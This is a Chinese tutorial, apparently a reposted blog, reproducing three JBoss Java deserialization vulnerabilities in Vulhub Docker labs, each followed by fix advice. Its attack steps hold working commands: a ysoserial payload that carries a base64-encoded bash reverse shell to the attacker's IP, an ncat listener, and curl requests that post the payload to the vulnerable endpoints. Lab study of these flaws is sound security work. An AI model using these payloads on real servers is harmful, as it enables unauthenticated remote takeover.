JBOSS反序列化漏洞解析与防范策略CVE-2017-12149

news2025/5/23 7:21:29

JBOSS反序列化漏洞解析与防范策略

引言

JBOSS是一个流行的开源应用服务器,广泛应用于企业级应用程序的开发和部署。然而,由于其广泛的使用和复杂的架构,JBOSS也成为了黑客攻击的常见目标。近年来,多个JBOSS漏洞被曝光,这些漏洞允许攻击者远程执行任意代码、窃取数据或导致服务中断,对企业和用户的信息安全构成了严重威胁。因此,理解和防范JBOSS漏洞成为了网络安全领域的重要课题。

JBOSS反序列化漏洞是近年来网络安全领域中的一个热点问题。反序列化是将序列化数据还原为对象的过程,而在JBOSS中,由于对输入数据的反序列化处理不当,攻击者可以利用这一过程注入恶意代码,从而实现远程代码执行、数据泄露等攻击。这种漏洞的存在,不仅威胁到JBOSS服务器本身的安全,还可能影响到使用JBOSS的应用程序和其背后的整个企业系统。因此,深入理解JBOSS反序列化漏洞的原理及其防范策略,对于保障网络安全具有重要意义。

原理

JBOSS反序列化漏洞的原理主要涉及到Java序列化机制。在Java中,序列化是将对象转换为字节流的过程,以便于存储或传输。反序列化则是将字节流重新转换为对象的过程。当JBOSS服务器接收到来自客户端的序列化数据时,它会尝试将这些数据反序列化为对象。如果攻击者精心构造了这些序列化数据,使其在反序列化过程中执行恶意代码,那么就可以实现远程代码执行等攻击。

环境搭建

介绍

Vulhub,由资深安全专家打造的开源漏洞靶场环境,已成为网络安全研究和测试的得力助手。它基于Docker和Docker Compose,为安全研究人员提供了一个快速、便捷的方式来搭建、使用和分享各种漏洞环境。

Vulhub的创建旨在简化漏洞测试流程,提供一个标准的测试平台,让安全研究更加高效和系统化。通过Vulhub,研究人员可以快速部署漏洞场景,进行深入研究,而无需担心对实际生产环境的影响。

对于网络安全爱好者来说,学习如何搭建Vulhub是提升技能的必经之路。这不仅涉及Docker和Docker Compose的技术应用,也是理解漏洞测试基本流程的实践机会。

搭建步骤

环境准备

Ubuntu虚拟机(其他Linux虚拟机也可以)、docker、docker-compose

下载vulhub(记得Star)

下载地址:vulhub/vulhub:基于 Docker-Compose 的预构建脆弱环境 — vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

上传至虚拟机

使用XFTP或者使用VMware提供的复制粘贴功能粘贴到虚拟机并解压,推荐放到桌面,方便管理

工具下载

下载地址:frohoff/ysosarial:一个概念验证工具,用于生成利用不安全 Java 对象私有化的有效负载。 — frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
java环境推荐1.8(亲测有效)

CVE-2017-12149

漏洞描述

CVE-2017-12149漏洞是一个反序列化远程代码执行漏洞,存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。攻击者可以通过构造恶意序列化数据,在未经身份验证的情况下在服务器上执行任意代码,从而控制服务器

影响范围

该漏洞影响以下版本的JBoss应用服务器:

  • JBoss 5.x版本
  • JBoss 6.x版本

漏洞原理

JBoss应用服务器在处理来自客户端的序列化数据时,没有进行适当的安全检查和限制,导致攻击者可以利用精心设计的序列化数据执行任意代码。具体来说,漏洞出现在/invoker/readonly路径下,服务器将用户提交的POST内容进行了Java反序列化1247

环境搭建

  1. 进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/CVE-2017-12149/
  2. 开启环境docker-compose up -d
  3. 使用docker ps查看正在运行的容器,可以看到端口号为8080
  4. 使用浏览器访问
    在这里插入图片描述

攻击复现

  1. 使用浏览器访问192.168.35.128:8080/invoker/readonly,出现如下界面
    在这里插入图片描述

  2. 监听端口

    # linux下使用
    nc -lvp 8888
    # windows下可以使用nmap工具的监听端口功能
    ncat -lvp 8888
    
  3. 进入到到工具目录

    java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" >poc.ser
    

    YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx为计划任务反弹Shellbash -i >& /dev/tcp/192.168.35.1/8888 0>&1的base64加密值,将其中的IP地址(攻击机IP地址)和监听端口改为自己需要的,在进行base64加密,ysoserial-all.jar为自己的工具文件名

    curl http://192.168.35.128:8080/invoker/readonly --data-binary @poc.ser
    

    使用 curl 工具向指定的http://192.168.35.128:8080/invoker/readonly发送一个 POST 请求,其中包含了名为 poc.ser 的文件内容作为请求体。

  4. 成功反弹Shell
    在这里插入图片描述

修复方案

针对CVE-2017-12149漏洞,修复方案包括:

  1. 升级JBoss版本:升级到不受影响的JBoss版本(例如,JBoss 7.x版本)。
  2. 删除不必要的组件:如果不需要http-invoker.sar组件,可以直接删除该组件。
  3. 添加安全控制:在http-invoker.sar下web.xml的security-constraint标签中添加访问控制,限制对http invoker组件的访问

CVE-2017-7504

漏洞描述

CVE-2017-7504漏洞存在于JBoss AS 4.x及之前版本的JbossMQ组件中。具体来说,漏洞位于HTTPServerILServlet.java文件,该文件在处理反序列化数据时没有进行适当的安全检查,导致攻击者可以借助特制的序列化数据执行任意代码

影响范围

该漏洞影响JBoss AS 4.x及之前版本

环境搭建

使用vulhub靶场,搭建教程vulhub搭建教程

  1. 进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/CVE-2017-7504/
  2. 开启环境docker-compose up -d
  3. 使用docker ps查看正在运行的容器,可以看到端口号为8080
  4. 使用浏览器访问
    在这里插入图片描述

攻击复现

  1. 使用浏览器访问192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet,出现如下界面
    在这里插入图片描述

  2. 其他步骤与CVE-2017-12149相同,只有最后请求的网址变了

    curl http://192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
    

修复建议

  1. 升级版本:升级到不受该漏洞影响的JBoss版本。
  2. 禁用相关服务:如果不需要JBossMQ服务,可以禁用该服务以避免漏洞利用。
  3. 修改配置:在服务器配置中限制对敏感路径的访问,例如修改jboss-web.deployer/server.xml中的绑定地址

JMXInvokerServlet-deserialization(CVE-2015-7501)

漏洞描述

JBoss在处理 /invoker/JMXInvokerServlet 请求时,会读取用户传入的对象并进行反序列化。攻击者可以利用Apache Commons Collections中的Gadget来执行任意代码

影响范围

该漏洞影响以下版本的JBoss产品:

  • JBoss Enterprise Application Platform 6.4.4, 5.2.0, 4.3.0 CP10
  • JBoss AS (Wildly) 6及之前版本
  • JBoss A-MQ 6.2.0
  • JBoss Fuse 6.2.0
  • JBoss SOA Platform (SOA-P) 5.3.1
  • JBoss Data Grid (JDG) 6.5.0
  • JBoss BRMS (BRMS) 6.1.0
  • JBoss BPMS (BPMS) 6.1.0
  • JBoss Data Virtualization (JDV) 6.1.0
  • JBoss Fuse Service Works (FSW) 6.0.0
  • JBoss Enterprise Web Server (EWS) 2.1, 3.0

环境搭建

使用vulhub靶场,搭建教程vulhub搭建教程

  1. 进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/JMXInvokerServlet-deserialization/
  2. 开启环境docker-compose up -d
  3. 使用docker ps查看正在运行的容器,可以看到端口号为8080
  4. 使用浏览器访问
    在这里插入图片描述

攻击复现

  1. 使用浏览器访问192.168.35.128:8080/invoker/JMXInvokerServlet,下载了文件,说明漏洞存在

  2. 其他步骤与CVE-2017-12149相同,只有最后请求的网址变了

    curl http://192.168.35.128:8080/invoker/JMXInvokerServlet --data-binary @poc.ser
    

修复建议

  1. 更新版本:升级到不受该漏洞影响的JBoss版本。
  2. 禁用相关服务:如果不需要JBossMQ服务,可以禁用该服务以避免漏洞利用。
  3. 修改配置:在服务器配置中限制对敏感路径的访问。例如,修改 jboss-web.deployer/server.xml 中的绑定地址。
  4. 使用安全库:更新Apache Commons Collections库,并使用SerialKiller来控制反序列化的可信类型

参考文章:

JBoss反序列化漏洞复现_cve-2017-7504-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2336841.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Web3技术下数字资产数据保护的实践探索

在这个信息爆炸的时代,数字资产已经成为我们生活中不可或缺的一部分。随着Web3技术的兴起,它以其去中心化、透明性和安全性的特点,为数字资产的管理和保护提供了新的解决方案。本文将探讨Web3技术在数字资产数据保护方面的实践探索&#xff0…

从PPT到PNG:Python实现的高效PPT转图工具

从PPT到PNG:Python实现的高效PPT转图工具 在日常工作中,PPT(PowerPoint)文件是我们常用的演示工具。然而,有时候我们需要将PPT的内容提取为图片格式(如PNG)以便于展示或保存。手动将每一页PPT保…

Rust-引用借用规则

目录 一、概述 二、借用规则 三、详细解释 3.1 第一条规则 3.2 第二条规则 3.3 第三条规则 四、总结 Welcome to Code Blocks blog 本篇文章主要介绍了 [Rust-引用借用规则] ❤博主广交技术好友,喜欢文章的可以关注一下❤ 一、概述 Rust为确保程序在运行时不…

如何保障企业数据的安全?软件开发中的数据安全防护措施

引言 随着数字化转型的推进,数据已经成为企业最重要的资产之一。然而,随着数据量的增长,数据泄露、丢失和滥用的风险也不断增加。如何保障企业数据的安全,成为企业在进行软件开发时必须重点关注的问题。本文将介绍软件开发中的一些…

Linux安装开源版MQTT Broker——EMQX服务器环境从零到一的详细搭建教程

零、EMQX各个版本的区别 EMQX各个版本的功能对比详情https://docs.emqx.com/zh/emqx/latest/getting-started/feature-comparison.html

【软件工程大系】净室软件工程

净室软件工程(Cleanroom Software Engineering)是一种以缺陷预防(正确性验证)为核心的软件开发方法,旨在通过严格的工程规范和数学验证,在开发过程中避免缺陷的产生,而非依赖后期的测试和调试。…

软考 系统架构设计师系列知识点之杂项集萃(49)

接前一篇文章:软考 系统架构设计师系列知识点之杂项集萃(48) 第76题 某文件管理系统在磁盘上建立了位视图(bitmap),记录磁盘的使用情况。若磁盘上物理块的编号依次为:0、1、2、……&#xff1b…

JVM 调优不再难:AI 工具自动生成内存优化方案

在 Java 应用程序的开发与运行过程中,Java 虚拟机(JVM)的性能调优一直是一项极具挑战性的任务,尤其是内存优化方面。不合适的 JVM 内存配置可能会导致应用程序出现性能瓶颈,甚至频繁抛出内存溢出异常,影响业…

封装Tcp Socket

封装Tcp Socket 0. 前言1. Socket.hpp2. 简单的使用介绍 0. 前言 本文中用到的Log.hpp在笔者的历史文章中都有涉及,这里就不再粘贴源码了,学习地址如下:https://blog.csdn.net/weixin_73870552/article/details/145434855?spm1001.2014.3001…

Linux 入门九:Linux 进程间通信

概述 进程间通信(IPC,Inter-Process Communication)是指在不同进程之间传递数据和信息的机制。Linux 提供了多种 IPC 方式,包括管道、信号、信号量、消息队列、共享内存和套接字等。 方式 一、管道(Pipe&#xff09…

Redis之缓存更新策略

缓存更新策略 文章目录 缓存更新策略一、策略对比二、常见的缓存更新策略三、如何选择策略四、实际应用示例五、使用 Cache-Aside TTL 的方式,实现缓存商铺信息详情1.引入StringRedisTemplate2.将查询商铺信息加入缓存3.更新商铺信息时移除缓存总结 六、注意事项 一…

【leetcode100】杨辉三角

1、题目描述 给定一个非负整数 numRows,生成「杨辉三角」的前 numRows 行。 在「杨辉三角」中,每个数是它左上方和右上方的数的和。 示例 1: 输入: numRows 5 输出: [[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]示例 2: 输入: numRows 1 输出: [[1]…

Selenium2+Python自动化:利用JS解决click失效问题

文章目录 前言一、遇到的问题二、点击父元素问题分析解决办法实现思路 三、使用JS直接点击四、参考代码 前言 在使用Selenium2和Python进行自动化测试时,我们有时会遇到这样的情况:元素明明已经被成功定位,代码运行也没有报错,但…

OpenStack Yoga版安装笔记(十九)启动一个实例(Self-service networks)

1、概述 1.1 官方文档 Launch an instancehttps://docs.openstack.org/install-guide/launch-instance.html 《OpenStack Yoga版安装笔记(十四)启动一个实例》文档中,已经按照Option1: Provider networks创建网络。 本文按照Option2&#…

数学教学通讯杂志数学教学通讯杂志社数学教学通讯编辑部2025年第6期目录

课程教材教法 “课程思政”视域下的高中数学教学探索与实践——以“函数概念的发展历程”为例 赵文博; 3-617 PBL教学模式下高中统计教学的探索与实践——以“随机抽样(第一课时)”为例 陈沛余; 7-10 “三新”背景下的高中数学教学困境与应对…

C#容器源码分析 --- Dictionary<TKey,TValue>

Dictionary<TKey, TValue> 是 System.Collections.Generic 命名空间下的高性能键值对集合&#xff0c;其核心实现基于​​哈希表​​和​​链地址法&#xff08;Separate Chaining&#xff09;。 .Net4.8 Dictionary<TKey,TValue>源码地址&#xff1a; dictionary…

在 Visual Studio Code 中安装通义灵码 - 智能编码助手

高效的编码工具对于提升开发效率和代码质量至关重要。 通义灵码作为一款智能编码助手&#xff0c;为开发者提供了全方位的支持。 本文将详细介绍如何在 Visual Studio Code&#xff08;简称 VSCode&#xff09;中安装通义灵码&#xff0c;以及如何进行相关配置以开启智能编码…

idea报错java: 非法字符: ‘\ufeff‘解决方案

解决方案步骤以及说明 BOM是什么&#xff1f;1. BOM的作用2. 为什么会出现 \ufeff 错误&#xff1f;3. 如何解决 \ufeff 问题&#xff1f; 最后重新编译&#xff0c;即可运行&#xff01;&#xff01;&#xff01; BOM是什么&#xff1f; \ufeff 是 Unicode 中的 BOM&#xff0…

PHY芯片与网络变压器接线设计指南——不同速率与接口的硬件设计原则

一、PHY与网络变压器的核心作用 • PHY芯片&#xff08;物理层芯片&#xff09; • 功能&#xff1a;实现数据编码&#xff08;如Manchester、PAM4&#xff09;、时钟恢复、链路协商&#xff08;Auto-Negotiation&#xff09;。 • 接口类型&#xff1a;MII/RMII/GMII/RGMII/…

【学习笔记】计算机网络(八)—— 音频/视频服务

第8章 互联网上的音频/视频服务 文章目录 第8章 互联网上的音频/视频服务8.1概述8.2 流式存储音频/视频8.2.1 具有元文件的万维网服务器8.2.2 媒体服务器8.2.3 实时流式协议 RTSP 8.3 交互式音频/视频8.3.1 IP 电话概述8.3.2 IP电话所需要的几种应用协议8.3.3 实时运输协议 RTP…